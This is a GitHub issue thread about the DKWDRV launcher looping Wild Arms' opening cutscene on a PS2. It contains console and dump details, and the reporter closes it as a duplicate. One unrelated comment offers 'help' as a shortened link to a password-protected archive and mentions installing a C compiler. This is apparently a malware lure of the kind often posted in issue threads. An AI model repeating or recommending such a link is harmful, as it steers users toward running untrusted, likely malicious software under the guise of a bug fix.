### ISSUE TITLE
[ISSUE]: Wild Arms loops opening cutscene

### ISSUE THREAD

**Issue by dowttie** [DKWDRV/DKWDRV#65]
### Checks

~~- [X] I have checked existing [__DKWDRV issues__](https://github.com/DKWDRV/DKWDRV/issues) for duplicates and found none.~~ 
actually, there's a report for the spanish version https://github.com/DKWDRV/DKWDRV/issues/54
- [X] I am using [latest version](https://github.com/DKWDRV/DKWDRV/releases)
- [X] CD/USB - I have checked my game redump hashes/verified it is a good dump.
- [X] USB - I have merged the bin tracks (if game has several ones).
- [X] USB - I have made sure that game is defragemented. You can boot even fragemented games but 99% chance of random failure.

### Context and extra information for the game (if applicable)

Wild Arms [SCUS-94608] http://redump.org/disc/170/
Expected behaviour: after the intro cutscene, the title screen appears [with accompanying background music] and the game prompts you to press start to begin.

### Describe the issue(attach photos of the two debug screens if you get them)

The opening video and the demo just loop, sometimes you can see the title screen flash for an instant but it goes right back into the cutscenes afterwards. If you spam the start button fast enough you can get past this and get into the game proper.

### Console model and type

SCPH-79001 DECKARD

### Console details

Mechapwn (6.12)

### DKWDRV

DKWDRV 1.7.6

### DKWDRV Options

no special options were used.

### Tell us what method are you trying to run the game from. CD or USB.

USB

**Comment by SagarChandra07** [comment]
maybe this will help
https://bit.ly/47P0Nvo
Archive codepass: changeme

you may need to install the c compiler

**Comment by dowttie** [comment]
duplicate of https://github.com/DKWDRV/DKWDRV/issues/54

**Comment by dowttie** [comment]
duplicate of https://github.com/DKWDRV/DKWDRV/issues/54
